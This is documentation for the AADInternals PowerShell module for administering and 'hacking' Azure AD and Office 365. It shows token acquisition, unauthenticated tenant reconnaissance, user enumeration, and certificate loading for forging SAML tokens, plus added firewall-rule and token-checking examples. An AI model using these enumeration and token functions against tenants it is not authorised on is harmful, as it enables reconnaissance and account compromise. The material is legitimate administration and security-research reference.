AAD Internals


The AADInternals PowerShell module contains tools for administering and hacking Azure AD and Office 365.


The module can be installed from PowerShell:

Install-Module AADInternals

The module is also available on GitHub at https://github.com/Gerenios/AADInternals.


AAD Internals is a PowerShell module where I’ve tried to put all the knowledge I’ve gained during the years spent with Office 365 and Azure AD. It is a result of hours of reverse-engineering and debugging of Microsoft tools related to Azure AD, such as PowerShell modules, directory synchronisation, and admin portals.

The module is a plain PowerShell script module, so you can copy and paste the code to your own scripts as needed. Having said that, there are some functions that utilise the built-in functionality of Windows. Thus, everything might not work on every computer.

The module is now in early beta, so all comments and ideas are more than welcome. You can comment on this article or post bugs and fixes to GitHub.

I haven’t tried to duplicate all the functionality the MSOnline or AzureAD modules currently have. Instead, I decided to bring the information and functionality those modules don’t provide. Also, I have created some “blackhat” level functionality that allows administrators to do things that shouldn’t even be possible.

Detailed help about parameters etc. can be seen using the PowerShell Get-Help cmdlet:

# See help for Get-AADIntAccessTokenForAADGraph
Get-Help Get-AADIntAccessTokenForAADGraph

Version info

Version Date          Version notes
------- ----          -------------
0.1.1   Oct 25th 2018 The first beta release.


Playing with access tokens

Most of the functions are using REST APIs which require OAuth access tokens. The AADInternals module is using three types of access tokens:

Token/API                   Function                         Remarks
---------                   --------                         -------
AAD Graph                   Get-AADIntAccessTokenForAADGraph Functions using the AAD Graph access token have a cache, so there is no need to pass it as a parameter. If credentials are not passed, the function prompts for them (supports MFA).
MS Graph                    Get-AADIntAccessTokenForMSGraph  Not used in this version.
Pass Through Authentication Get-AADIntAccessTokenForPTA      Used when enabling/disabling PTA.
Azure Admin Portal          Get-AADIntAuthTokenForAADIAMAPI  Used when inviting guest users.

To get an AAD Graph access token and save it to cache, run the following function. The token is valid for an hour; after that, you need to run the function again.

# Prompt for credentials and retrieve & store access token to cache
Get-AADIntAccessTokenForAADGraph

Information Functions

Information functions can be used to retrieve information about users, tenants, and Office 365. Functions marked with * don’t need authentication. Functions marked with A use the AAD Graph access token.

Get-AADIntLoginInformation (*)

This function returns login information for the given user (or domain).


# Get login information for a domain
Get-AADIntLoginInformation -Domain company.com


Federation Protocol                  : WSTrust
Pref Credential                      : 4
Consumer Domain                      : 
Cloud Instance audience urn          : urn:federation:MicrosoftOnline
Authentication Url                   : https://msft.sts.microsoft.com/adfs/ls/?username=nn%40microsoft.com&wa=wsignin1.0&wtrealm=urn%3afederation%3aMicrosoftOnline&wctx=
Throttle Status                      : 1
Account Type                         : Federated
Has Password                         : True
Federation Active Authentication Url : https://msft.sts.microsoft.com/adfs/services/trust/2005/usernamemixed
Exists                               : 0
Federation Metadata Url              : https://msft.sts.microsoft.com/adfs/services/trust/mex
Desktop Sso Enabled                  : 
Tenant Banner Logo                   : 
Tenant Locale                        : 
Cloud Instance                       : microsoftonline.com
State                                : 3
Domain Type                          : 4
Domain Name                          : microsoft.com
Tenant Banner Illustration           : 
Federation Brand Name                : Microsoft
Federation Global Version            : -1
User State                           : 2

Get-AADIntEndpointInstances (*)

This function returns Office 365 instances and information about when the latest changes (e.g. to IPs and URLs) were made.


# Get Office 365 instances
Get-AADIntEndpointInstances


instance     latest    
--------     ------    
Worldwide    2018100100
USGovDoD     2018100100
USGovGCCHigh 2018100100
China        2018100100
Germany      2018100100

Get-AADIntEndpointIps (*)

This function returns Office 365 IP addresses and URLs for the given instance. The information can be used to create firewall rules.


# Get ips and urls for "normal" Office 365
Get-AADIntEndpointIps -Instance WorldWide


id                     : 1
serviceArea            : Exchange
serviceAreaDisplayName : Exchange Online
urls                   : {outlook.office.com, outlook.office365.com}
ips                    : {,,,}
tcpPorts               : 80,443
expressRoute           : True
category               : Optimize
required               : True

id                     : 2
serviceArea            : Exchange
serviceAreaDisplayName : Exchange Online
urls                   : {smtp.office365.com}
ips                    : {,,,}
tcpPorts               : 587
expressRoute           : True
category               : Allow
required               : True
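
One way to turn endpoint sets like these into outbound firewall rules, as an added example that is not part of AADInternals. ConvertTo-FirewallRuleSpec is a hypothetical helper name, the sample objects are constructed to match the shape of the output above, and the address ranges are documentation prefixes rather than real Office 365 ranges.

```powershell
# CONSTRUCTED sample data in the shape of the Get-AADIntEndpointIps output.
# Address ranges are documentation prefixes (RFC 5737 / RFC 3849).
$endpoints = @(
    [pscustomobject]@{
        id = 1; serviceArea = 'Exchange'; category = 'Optimize'; required = $true
        urls = @('outlook.office.com', 'outlook.office365.com')
        ips = @('192.0.2.0/24', '2001:db8::/32'); tcpPorts = '80,443'
    }
    [pscustomobject]@{
        id = 2; serviceArea = 'Exchange'; category = 'Allow'; required = $true
        urls = @('smtp.office365.com')
        ips = @('198.51.100.0/24'); tcpPorts = '587'
    }
    [pscustomobject]@{
        # URL-only endpoint set: nothing an IP-based rule can express
        id = 3; serviceArea = 'Common'; category = 'Default'; required = $true
        urls = @('example.invalid'); ips = @(); tcpPorts = '443'
    }
    [pscustomobject]@{
        # Optional endpoint set: skipped when -RequiredOnly is used
        id = 4; serviceArea = 'Common'; category = 'Default'; required = $false
        urls = @('optional.example.invalid')
        ips = @('203.0.113.0/24'); tcpPorts = '443'
    }
)

function ConvertTo-FirewallRuleSpec {   # hypothetical helper name
    param(
        [Parameter(Mandatory, ValueFromPipeline)]$Endpoint,
        [switch]$RequiredOnly
    )
    process {
        if ($RequiredOnly -and -not $Endpoint.required) { return }

        # Drop empty entries; tcpPorts is assumed to be a comma-separated string
        $addresses = @($Endpoint.ips | Where-Object { $_ })
        $ports = @("$($Endpoint.tcpPorts)".Split(',') |
            ForEach-Object { $_.Trim() } | Where-Object { $_ })

        if ($addresses.Count -eq 0 -or $ports.Count -eq 0) {
            # No address or port data: these URLs belong on a proxy allow-list
            Write-Warning ("Endpoint set {0} has no IP/TCP data; allow by URL instead: {1}" -f
                $Endpoint.id, ($Endpoint.urls -join ', '))
            return
        }

        # Parameter set for New-NetFirewallRule, one rule per endpoint set
        @{
            DisplayName   = "O365 $($Endpoint.serviceArea) set $($Endpoint.id) ($($Endpoint.category))"
            Direction     = 'Outbound'
            Action        = 'Allow'
            Protocol      = 'TCP'
            RemoteAddress = $addresses
            RemotePort    = $ports
        }
    }
}

# With the module loaded, the input would instead be:
#   Get-AADIntEndpointIps -Instance WorldWide | ConvertTo-FirewallRuleSpec -RequiredOnly
$specs = @($endpoints | ConvertTo-FirewallRuleSpec -RequiredOnly)

# Review the generated rules before creating anything
$specs | ForEach-Object { [pscustomobject]$_ } |
    Format-Table DisplayName, RemotePort, RemoteAddress -AutoSize

# Dry run only: -WhatIf shows what would be created without changing the firewall
if (Get-Command New-NetFirewallRule -ErrorAction SilentlyContinue) {
    foreach ($spec in $specs) { New-NetFirewallRule @spec -WhatIf }
}
```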

Get-AADIntTenantDetails (A)

This function returns details for the given tenant.


# Get tenant details
Get-AADIntTenantDetails


odata.type                           : Microsoft.DirectoryServices.TenantDetail
objectType                           : Company
objectId                             : e21e0e8c-d2ed-4edf-aa91-937963949cdc
deletionTimestamp                    : 
assignedPlans                        : ..
city                                 : 
companyLastDirSyncTime               : 2018-10-25T12:53:43Z
country                              : 
countryLetterCode                    : FI
dirSyncEnabled                       : True
displayName                          : Company Ltd
marketingNotificationEmails          : {}
postalCode                           : 
preferredLanguage                    : en
privacyProfile                       : 
provisionedPlans                     : ..
provisioningErrors                   : {}
securityComplianceNotificationMails  : {}
securityComplianceNotificationPhones : {}
state                                : 
street                               : 
technicalNotificationMails           : {user@alt.none}
telephoneNumber                      : 123456789
verifiedDomains                      : ..

Get-AADIntServiceLocations (A)

This function shows the tenant’s true service locations.


# Get service location information of the tenant
Get-AADIntServiceLocations | Format-Table


Region Instance             Name                          State Country
------ --------             ----                          ----- -------
EU     EU001                PowerBI                             IR     
EU     PROD_MSUB01_02       SCO                                 IE     
NA     NA001                MultiFactorService                  US     
NA     NA001                AzureAdvancedThreatAnalytics        US     
EU     Prod04               Adallom                             GB     
NA     NA001                AADPremiumService                   US     
EU     EURP191-001-01       exchange                            IE     
NA     NA003                YammerEnterprise                    US     
NA     NA001                To-Do                               US     
NA     NA001                TeamspaceAPI                        US     
NA     NA001                Sway                                US     
EU     SPOS1196             SharePoint                          NL     
EU     EU                   RMSOnline                           NL     
EU     PROD_EU_Org_Ring_152 ProjectWorkManagement               NL     
NA     NA001                ProcessSimple                       US     
NA     NA001                PowerAppsService                    US     
NA     NA001                OfficeForms                         US     
NA     NA001                MicrosoftStream                     US     
NA     NorthAmerica1        MicrosoftOffice                     US     
EU     EMEA-2E-S3           MicrosoftCommunicationsOnline       NL     
EU     emea05-01            ExchangeOnlineProtection            NL     
NA     NA001                Deskless                            US     
NA     NA002                SMIT                                US     
NA     NA001                Metro                               US     
EU     EU003                DirectoryToCosmos                   GB     
NA     *                    BecWSClients                        US     
NA     NA033                BDM                                 US     
EU     EUGB02               AadAllTenantsNotifications          GB

Get-AADIntServicePlans (A)

This function returns information about the tenant’s service plans, such as name, id, status, and when first assigned.


# Get the service plans of the tenant
Get-AADIntServicePlans | Format-Table


SKU               ServicePlanId                        ServiceName           ServiceType                   AssignedTimestamp    CapabilityStatus ProvisioningStatus
---               -------------                        -----------           -----------                   -----------------    ---------------- ------------------
ENTERPRISEPREMIUM b1188c4c-1b36-4018-b48b-ee07604f6feb PAM_ENTERPRISE        Exchange                      2018-09-27T15:47:45Z Enabled          Success           
                  76846ad7-7776-4c40-a281-a386362dd1b9                       ProcessSimple                 2018-09-27T15:47:25Z Deleted                            
                  c87f142c-d1e9-4363-8630-aaea9c4d9ae5                       To-Do                         2018-09-27T15:47:24Z Deleted                            
                  c68f8d98-5534-41c8-bf36-22fa496fa792                       PowerAppsService              2018-09-27T15:47:25Z Deleted                            
                  9e700747-8b1d-45e5-ab8d-ef187ceec156                       MicrosoftStream               2018-09-27T15:47:25Z Deleted                            
                  2789c901-c14e-48ab-a76a-be334d9d793a                       OfficeForms                   2018-09-27T15:47:25Z Deleted                            
ENTERPRISEPREMIUM 9f431833-0334-42de-a7dc-70aa40db46db LOCKBOX_ENTERPRISE    Exchange                      2018-08-27T05:46:50Z Enabled          Success           
ENTERPRISEPREMIUM 3fb82609-8c27-4f7b-bd51-30634711ee67 BPOS_S_TODO_3         To-Do                         2018-08-27T05:46:50Z Enabled          Success           
ENTERPRISEPREMIUM 7547a3fe-08ee-4ccb-b430-5077c5041653 YAMMER_ENTERPRISE     YammerEnterprise              2018-08-27T05:46:51Z Enabled          Success           
ENTERPRISEPREMIUM 8e0c0a52-6a6c-4d40-8370-dd62790dcd70 THREAT_INTELLIGENCE   Exchange                      2018-08-27T05:46:50Z Enabled          Success           
ENTERPRISEPREMIUM 9c0dab89-a30c-4117-86e7-97bda240acd2 POWERAPPS_O365_P3     PowerAppsService              2018-08-27T05:46:50Z Enabled          Success           
ENTERPRISEPREMIUM b737dad2-2f6c-4c65-90e3-ca563267e8b9 PROJECTWORKMANAGEMENT ProjectWorkManagement         2018-08-27T05:46:51Z Enabled          Success           
ENTERPRISEPREMIUM 5dbe027f-2339-4123-9542-606e4d348a72 SHAREPOINTENTERPRISE  SharePoint                    2018-08-27T05:46:51Z Enabled          Success           
ENTERPRISEPREMIUM 8c098270-9dd4-4350-9b30-ba4703f3b36b ADALLOM_S_O365        Adallom                       2018-08-27T05:46:50Z Enabled          Success           
ENTERPRISEPREMIUM 6c6042f5-6f01-4d67-b8c1-eb99d36eed3e STREAM_O365_E5        MicrosoftStream               2018-08-27T05:46:50Z Enabled          Success           
ENTERPRISEPREMIUM 07699545-9485-468e-95b6-2fca3738be01 FLOW_O365_P3          ProcessSimple                 2018-08-27T05:46:50Z Enabled          Success           
ENTERPRISEPREMIUM 4de31727-a228-4ec3-a5bf-8e45b5ca48cc EQUIVIO_ANALYTICS     Exchange                      2018-08-27T05:46:50Z Enabled          Success           
ENTERPRISEPREMIUM 0feaeb32-d00e-4d66-bd5a-43b5b83db82c MCOSTANDARD           MicrosoftCommunicationsOnline 2018-08-27T05:46:51Z Enabled          Success           
ENTERPRISEPREMIUM 70d33638-9c74-4d01-bfd3-562de28bd4ba BI_AZURE_P2           PowerBI                       2018-08-27T05:46:51Z Enabled          Success           
ENTERPRISEPREMIUM 43de0ff5-c92c-492b-9116-175376d08c38 OFFICESUBSCRIPTION    MicrosoftOffice               2018-08-27T05:46:51Z Enabled          Success           
ENTERPRISEPREMIUM 3e26ee1f-8a5f-4d52-aee2-b81ce45c8f40 MCOMEETADV            MicrosoftCommunicationsOnline 2018-08-27T05:46:51Z Enabled          Success           
ENTERPRISEPREMIUM e95bec33-7c88-4a70-8e19-b10bd9d0c014 SHAREPOINTWAC         SharePoint                    2018-08-27T05:46:51Z Enabled          Success           
ENTERPRISEPREMIUM 8c7d2df8-86f0-4902-b2ed-a0458298f3b3 Deskless              Deskless                      2018-08-27T05:46:50Z Enabled          Success           
ENTERPRISEPREMIUM 57ff2da0-773e-42df-b2af-ffb7a2317929 TEAMS1                TeamspaceAPI                  2018-08-27T05:46:50Z Enabled          Success           
ENTERPRISEPREMIUM 4828c8ec-dc2e-4779-b502-87ac9ce28ab7 MCOEV                 MicrosoftCommunicationsOnline 2018-08-27T05:46:51Z Enabled          Success           
ENTERPRISEPREMIUM 34c0d7a0-a70f-4668-9238-47f9fc208882 EXCHANGE_ANALYTICS    Exchange                      2018-08-27T05:46:50Z Enabled          Success           
ENTERPRISEPREMIUM f20fedf3-f3c3-43c3-8267-2bfdd51c0939 ATP_ENTERPRISE        Exchange                      2018-08-27T05:46:51Z Enabled          Success           
ENTERPRISEPREMIUM efb87545-963c-4e0d-99df-69c6916d9eb0 EXCHANGE_S_ENTERPRISE Exchange                      2018-08-27T05:46:51Z Enabled          Success           
ENTERPRISEPREMIUM e212cbc7-0961-4c40-9825-01117710dcb1 FORMS_PLAN_E5         OfficeForms                   2018-08-27T05:46:50Z Enabled          Success           
ENTERPRISEPREMIUM a23b959c-7ce8-4e57-9140-b90eb88a9e97 SWAY                  Sway                          2018-08-27T05:46:51Z Enabled          Success           
EMSPREMIUM        113feb6c-3fe4-4440-bddc-54d774bf0318 EXCHANGE_S_FOUNDATION Exchange                      2018-08-13T10:17:31Z Enabled          Success           
EMSPREMIUM        eec0eb4f-6444-4f95-aba0-50c24d67f998 AAD_PREMIUM_P2        AADPremiumService             2018-08-13T10:17:33Z Enabled          Success           
EMSPREMIUM        c1ec4a95-1f05-45b3-a911-aa3fa01094f5 INTUNE_A              SCO                           2018-08-13T10:17:32Z Enabled          Success           
EMSPREMIUM        2e2ddb96-6af9-4b1d-a3f0-d6ecfd22edb2 ADALLOM_S_STANDALONE  Adallom                       2018-08-13T10:17:31Z Enabled          Success           
EMSPREMIUM        6c57d4b6-3b23-47a5-9bc9-69f17b4947b3 RMS_S_PREMIUM         RMSOnline                     2018-08-13T10:17:32Z Enabled          Success           
EMSPREMIUM        41781fb2-bc02-4b7c-bd55-b576c07bb09d AAD_PREMIUM           AADPremiumService             2018-08-13T10:17:34Z Enabled          Success           
EMSPREMIUM        14ab5db5-e6c4-4b20-b4bc-13e36fd2227f ATA                   AzureAdvancedThreatAnalytics  2018-08-13T10:17:31Z Enabled          Success           
EMSPREMIUM        8a256a2b-b617-496d-b51b-e76466e88db0 MFA_PREMIUM           MultiFactorService            2018-08-13T10:17:33Z Enabled          Success           
EMSPREMIUM        5689bec4-755d-4753-8b61-40975025187c RMS_S_PREMIUM2        RMSOnline                     2018-08-13T10:17:31Z Enabled          Success           
ENTERPRISEPREMIUM 882e1d05-acd1-4ccb-8708-6ee03664b117 INTUNE_O365           SCO                           2018-07-26T15:47:50Z Deleted          PendingActivation 
EMSPREMIUM        bea4c11e-220a-4e6d-8eb8-8ea15d019f90 RMS_S_ENTERPRISE      RMSOnline                     2018-06-26T10:47:37Z Enabled          Success

Get-AADIntSubscriptions (A)

This function returns the tenant’s subscription details, such as name, id, number of licenses, and when created.


# Get subscriptions of the tenant
Get-AADIntSubscriptions | Format-Table


SkuPartNumber     WarningUnits TotalLicenses IsTrial NextLifecycleDate    OcpSubscriptionId                    ConsumedUnits ObjectId                             SkuId                                DateCreated         
-------------     ------------ ------------- ------- -----------------    -----------------                    ------------- --------                             -----                                -----------         
EMSPREMIUM        0            250           true    2018-11-13T00:00:00Z 76909010-12ed-4b05-b3d7-ee1b42c21b4e 21            58265dbe-24e0-4cdb-8b62-51197a4c1c13 b05e124f-c7cc-45a0-a6aa-8cf78c946968 2018-08-13T00:00:00Z
ENTERPRISEPREMIUM 25           25            true    2018-10-27T15:47:40Z 7c206b83-2487-49fa-b91e-3d676de02ccb 21            df58544b-5062-4d6c-85de-937f203bbe0f c7df2760-2c81-4ef7-b578-5b5392b571df 2018-08-27T00:00:00Z

Get-AADIntSPOServiceInformation (A)

This function returns details of the tenant’s SharePoint Online instance, such as when created and last modified.


# Get SharePoint Online information
Get-AADIntSPOServiceInformation

Output: (sorted for clarity)

CreatedOn                               : 6/26/2018 11:16:12 AM
EnableOneDriveforSuiteUsers             : False
InstanceId                              : 44f5a625-f90e-4916-b8ab-ec45d38bdbb6
LastModifiedOn                          : 10/25/2018 7:37:38 AM
OfficeGraphUrl                          : https://company-my.sharepoint.com/_layouts/15/me.aspx
RootAdminUrl                            : https://company-admin.sharepoint.com/
RootIWSPOUrl                            : https://company-my.sharepoint.com/
SPO_LegacyPublicWebSiteEditPage         : Pages/Forms/AllItems.aspx
SPO_LegacyPublicWebSitePublicUrl        : 
SPO_LegacyPublicWebSiteUrl              : 
SPO_MySiteHostUrl                       : https://company-my.sharepoint.com/
SPO_MySiteHost_AboutMeUrl               : https://company-my.sharepoint.com/person.aspx
SPO_MySiteHost_DocumentsUrl             : https://company-my.sharepoint.com/_layouts/15/MySite.aspx?MySiteRedirect=AllDocuments
SPO_MySiteHost_NewsFeedUrl              : https://company-my.sharepoint.com/default.aspx
SPO_MySiteHost_ProjectSiteUrl           : https://company-my.sharepoint.com/_layouts/15/MyProjects.aspx
SPO_MySiteHost_SitesUrl                 : https://company-my.sharepoint.com/_layouts/15/MySite.aspx?MySiteRedirect=AllSites
SPO_PublicWebSitePublicUrl              : 
SPO_PublicWebSiteUrl                    : NotSupported
SPO_RegionalRootSiteUrl                 : https://company.sharepoint.com/
SPO_RootSiteUrl                         : https://company.sharepoint.com/
SPO_TenantAdminUrl                      : https://company-admin.sharepoint.com/
SPO_TenantAdmin_CreateSiteCollectionUrl : https://company-admin.sharepoint.com/_layouts/15/online/CreateSiteFull.aspx
SPO_TenantAdmin_ProjectAdminUrl         : https://company-admin.sharepoint.com/
SPO_TenantAdmin_ViewSiteCollectionsUrl  : https://company-admin.sharepoint.com/
SPO_TenantUpgradeUrl                    : https://company-admin.sharepoint.com/
ServiceInformation_LastChangeDate       : 10/25/2018 7:37:22 AM
ShowSites_InitialVisibility             : True
ShowSkyDrivePro_InitialVisibility       : True
ShowYammerNewsFeed_InitialVisibility    : True
VideoPortalServerRelativeUrl            : /portals/hub/_layouts/15/videohome.aspx

Get-AADIntCompanyInformation (A)

This function returns details about the tenant’s company information. Pretty much the same functionality as the Get-MsolCompanyInformation cmdlet.


# Get company information of the tenant
Get-AADIntCompanyInformation


AllowAdHocSubscriptions                  : false
AllowEmailVerifiedUsers                  : false
AuthorizedServiceInstances               : AuthorizedServiceInstances
AuthorizedServices                       : 
City                                     : 
CompanyDeletionStartTime                 : 
CompanyTags                              : CompanyTags
CompanyType                              : CompanyTenant
CompassEnabled                           : 
Country                                  : 
CountryLetterCode                        : GB
DapEnabled                               : 
DefaultUsageLocation                     : 
DirSyncAnchorAttribute                   : 
DirSyncApplicationType                   : 1651564e-7ce4-4d99-88be-0a65050d8dc3
DirSyncClientMachineName                 : SERVER2016
DirSyncClientVersion                     : 1.1.882.0
DirSyncServiceAccount                    : Sync_SERVER2016_acf4f37725ce@company.onmicrosoft.com
DirectorySynchronizationEnabled          : true
DirectorySynchronizationStatus           : Enabled
DisplayName                              : Company Ltd
InitialDomain                            : company.onmicrosoft.com
LastDirSyncTime                          : 2018-10-25T13:53:46Z
LastPasswordSyncTime                     : 2018-10-25T14:03:01Z
MarketingNotificationEmails              : 
MultipleDataLocationsForServicesEnabled  : 
ObjectId                                 : 6c1a3ac3-5416-4dd0-984e-228cc80dbc9f
PasswordSynchronizationEnabled           : true
PortalSettings                           : PortalSettings
PostalCode                               : 
PreferredLanguage                        : en
ReleaseTrack                             : StagedRollout
ReplicationScope                         : EU
RmsViralSignUpEnabled                    : false
SecurityComplianceNotificationEmails     : 
SecurityComplianceNotificationPhones     : 
SelfServePasswordResetEnabled            : false
ServiceInformation                       : ServiceInformation
ServiceInstanceInformation               : ServiceInstanceInformation
State                                    : 
Street                                   : 
SubscriptionProvisioningLimited          : false
TechnicalNotificationEmails              : TechnicalNotificationEmails
TelephoneNumber                          : 123456789
UIExtensibilityUris                      : 
UsersPermissionToCreateGroupsEnabled     : false
UsersPermissionToCreateLOBAppsEnabled    : false
UsersPermissionToReadOtherUsersEnabled   : true
UsersPermissionToUserConsentToAppEnabled : false

Get-AADIntCompanyTags (A)

This function returns tags attached to the tenant. Microsoft uses these to identify the status of certain changes, such as SharePoint version update.


# Get company tags of the tenant
Get-AADIntCompanyTags



Get-AADIntSyncConfiguration (A)

This function returns synchronisation details.


# Get synchronisation configuration of the tenant
Get-AADIntSyncConfiguration


TresholdCount                           : 501
UserContainer                           : 
TenantId                                : 6c1a3ac3-5416-4dd0-984e-228cc80dbc9f
ApplicationVersion                      : 1651564e-7ce4-4d99-88be-0a65050d8dc3
DisplayName                             : Company Ltd
IsPasswordSyncing                       : true
AllowedFeatures                         : {ObjectWriteback,  , PasswordWriteback}
PreventAccidentalDeletion               : EnabledForCount
TotalConnectorSpaceObjects              : 15
MaxLinksSupportedAcrossBatchInProvision : 15000
UnifiedGroupContainer                   : 
IsTrackingChanges                       : false
ClientVersion                           : 1.1.882.0
DirSyncFeatures                         : 41021
SynchronizationInterval                 : PT30M
AnchorAttribute                         : 
DirSyncClientMachine                    : SERVER2016
IsDirSyncing                            : true
TresholdPercentage                      : 0


Utilities

Utilities provide functionality for troubleshooting and so on.

Read-AADIntAccesstoken (*)

This function shows access (and id and refresh) token information. For debugging, the most important values are the audience (aud) and the issuer (iss).

You can also show details from a token copied from the browser session’s Authorization header.


# Show access token information
$at = Get-AADIntAccessTokenForAADGraph
Read-AADIntAccesstoken $at


aud                 : https://graph.windows.net
iss                 : https://sts.windows.net/fe177079-66f4-4f9f-bcb6-e085b92e3c8a/
iat                 : 1540478026
nbf                 : 1540478026
exp                 : 1540481926
acr                 : 1
aio                 : ASQA2/8JAAAAXhS3vMo2OGlXvBZG0tScm9njsJUDhvoHtwdSlUx2Jvg=
amr                 : {pwd}
appid               : 1b730954-1685-4b74-9bfd-dac224a7b894
appidacr            : 0
family_name         : demo
given_name          : admin
ipaddr              :
name                : admin demo
oid                 : 69be7da7-e29f-4753-b8c7-0417a63a1804
puid                : 1003BFFDABE606EE
scp                 : user_impersonation
sub                 : SaN7kFxdXhzQN6B7C8ThGEg4gBIrcXo3lzcayeoReps
tenant_region_scope : EU
tid                 : 6217f557-602d-4fc8-b2f9-5cb948f6ce26
unique_name         : admin@company.onmicrosoft.com
upn                 : admin@company.onmicrosoft.com
uti                 : bH3Bzy9D5ESLcW_S0KkoAA
ver                 : 1.0
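
The audience and issuer check described above, as an added PowerShell example that is not part of AADInternals: it decodes the payload of a token and compares aud, iss and the validity window with what the target API expects. Get-JwtClaims and Test-TokenForApi are hypothetical helper names, and the sample token is constructed from the aud, iss, iat, nbf and exp values in the output above.

```powershell
function ConvertTo-Base64Url([string]$Text) {
    # Only used to build the constructed sample token below
    [Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes($Text)).
        TrimEnd('=').Replace('+', '-').Replace('/', '_')
}

function ConvertFrom-Base64Url {
    param([Parameter(Mandatory)][string]$Text)
    # base64url -> base64: restore the alphabet and the stripped padding
    $b64 = $Text.Replace('-', '+').Replace('_', '/')
    switch ($b64.Length % 4) {
        2 { $b64 += '==' }
        3 { $b64 += '=' }
        1 { throw 'Invalid base64url length' }
    }
    [Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($b64))
}

function Get-JwtClaims {   # hypothetical helper name
    param([Parameter(Mandatory)][string]$Token)
    $parts = $Token.Split('.')
    if ($parts.Count -ne 3) {
        throw 'Expected three dot-separated parts: header.payload.signature'
    }
    # Decoding only: the signature is NOT verified here, the receiving API does that
    ConvertFrom-Base64Url $parts[1] | ConvertFrom-Json
}

function Test-TokenForApi {   # hypothetical helper name
    param(
        [Parameter(Mandatory)][string]$Token,
        [Parameter(Mandatory)][string]$ExpectedAudience,
        [Parameter(Mandatory)][string]$ExpectedTenantId,
        [DateTimeOffset]$Now = [DateTimeOffset]::UtcNow
    )
    $c = Get-JwtClaims $Token
    foreach ($name in 'aud', 'iss', 'nbf', 'exp') {
        if ($null -eq $c.$name) { throw "Token has no '$name' claim" }
    }

    # nbf/exp are seconds since the Unix epoch
    $nbf = [DateTimeOffset]::FromUnixTimeSeconds($c.nbf)
    $exp = [DateTimeOffset]::FromUnixTimeSeconds($c.exp)

    [pscustomobject]@{
        Audience        = $c.aud
        AudienceOk      = $c.aud.TrimEnd('/') -eq $ExpectedAudience.TrimEnd('/')
        Issuer          = $c.iss
        IssuerOk        = $c.iss -eq "https://sts.windows.net/$ExpectedTenantId/"
        NotBefore       = $nbf
        Expires         = $exp
        LifetimeMinutes = ($exp - $nbf).TotalMinutes
        ValidNow        = ($Now -ge $nbf) -and ($Now -lt $exp)
    }
}

# CONSTRUCTED, unsigned sample token (claim values taken from the output above)
$header  = @{ typ = 'JWT'; alg = 'none' } | ConvertTo-Json -Compress
$payload = [ordered]@{
    aud = 'https://graph.windows.net'
    iss = 'https://sts.windows.net/fe177079-66f4-4f9f-bcb6-e085b92e3c8a/'
    iat = 1540478026
    nbf = 1540478026
    exp = 1540481926
} | ConvertTo-Json -Compress
$sample = (ConvertTo-Base64Url $header), (ConvertTo-Base64Url $payload), 'constructed' -join '.'

# Evaluate the token at a fixed point in time inside its validity window
Test-TokenForApi -Token $sample `
    -ExpectedAudience 'https://graph.windows.net' `
    -ExpectedTenantId 'fe177079-66f4-4f9f-bcb6-e085b92e3c8a' `
    -Now ([DateTimeOffset]::FromUnixTimeSeconds(1540479000))

# The same token against another API: AudienceOk is False, so that API would reject it
Test-TokenForApi -Token $sample `
    -ExpectedAudience 'https://graph.microsoft.com' `
    -ExpectedTenantId 'fe177079-66f4-4f9f-bcb6-e085b92e3c8a' |
    Select-Object Audience, AudienceOk, ValidNow
```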

Get-AADIntCertificate (*)

This function loads a certificate from a .pfx file to a variable. Used to create SAML tokens.


# Load the certificate from a .pfx file
$cert = Get-AADIntCertificate -FileName 'C:\temp\cert.pfx' -Password 'mypassword'


Thumbprint                                Subject                                                                                                                                                                                                    
----------                                -------                                                                                                                                                                                                    
7fb507489addeee4dff2f64c68d1970c28b0da62  CN=sign.company.com, O=Company, S=Alaska, C=US

Get-AADIntImmutableID (*)

This function returns the ImmutableId for the given ADUser object. It must be run on a computer that has the ActiveDirectory module.


# Get ImmutableId for an ADUser
$user=Get-ADUser "myuser"
Get-AADIntImmutableID -ADUser $user



User manipulation

User manipulation functions provide the basic user adding/editing/deleting functionality and some extras.

Get-AADIntUsers (A)

This function returns users of the tenant.


# Get users
Get-AADIntUsers | Select UserPrincipalName,ObjectId,ImmutableId


UserPrincipalName                                               ObjectId                             ImmutableId             
-----------------                                               --------                             -----------  
LeeG@company.com                                                2eee0a36-9e2f-4985-80e1-4172ed8b3213 7jYndBUFCEqlXQNZEO3uwQ==
LidiaH@company.com                                              34289155-2798-432d-9398-53e7e0918f38 W3clIieLs0ivUeoY1lu1fg==
AllanD@company.com                                              3a0eea57-9f74-4ee5-8e84-353c35581cc2 BzPotuy3G0ySBJN5tZwB4w==

Get-AADIntUser (A)

This function returns information for the given user.


# Get user information
Get-AADIntUser -UserPrincipalName "LeeG@company.com"


AlternateEmailAddresses                : 
AlternateMobilePhones                  : 
AlternativeSecurityIds                 : 
BlockCredential                        : false
City                                   : 
CloudExchangeRecipientDisplayType      : 1073741824
Country                                : 
Department                             : Manufacturing
DirSyncProvisioningErrors              : 
DisplayName                            : Lee Gu
Errors                                 : 
Fax                                    : 
FirstName                              : Lee
ImmutableId                            : 7jYndBUFCEqlXQNZEO3uwQ==
IndirectLicenseErrors                  : 
IsBlackberryUser                       : false
IsLicensed                             : true
LastDirSyncTime                        : 2018-06-26T11:04:16Z
LastName                               : Gu
LastPasswordChangeTimestamp            : 2017-10-03T04:44:43Z
LicenseAssignmentDetails               : LicenseAssignmentDetails
LicenseReconciliationNeeded            : false
Licenses                               : Licenses
LiveId                                 : 1003BFFDABE61DB7
MSExchRecipientTypeDetails             : 
MSRtcSipDeploymentLocator              : 
MSRtcSipPrimaryUserAddress             : 
MobilePhone                            : 
OathTokenMetadata                      : 
ObjectId                               : 2eee0a36-9e2f-4985-80e1-4172ed8b3213
Office                                 : 23/3101
OverallProvisioningStatus              : PendingInput
PasswordNeverExpires                   : true
PasswordResetNotRequiredDuringActivate : true
PhoneNumber                            : +1 913 555 0101
PortalSettings                         : 
PostalCode                             : 66210
PreferredDataLocation                  : 
PreferredLanguage                      : 
ProxyAddresses                         : ProxyAddresses
ReleaseTrack                           : 
ServiceInformation                     : 
SignInName                             : LeeG@company.com
SoftDeletionTimestamp                  : 
State                                  : KS
StreetAddress                          : 10801 Mastin Blvd., Suite 620
StrongAuthenticationMethods            : 
StrongAuthenticationPhoneAppDetails    : 
StrongAuthenticationProofupTime        : 
StrongAuthenticationRequirements       : 
StrongAuthenticationUserDetails        : 
StrongPasswordRequired                 : true
StsRefreshTokensValidFrom              : 2017-10-03T04:44:43Z
Title                                  : Director
UsageLocation                          : FI
UserLandingPageIdentifierForO365Shell  : 
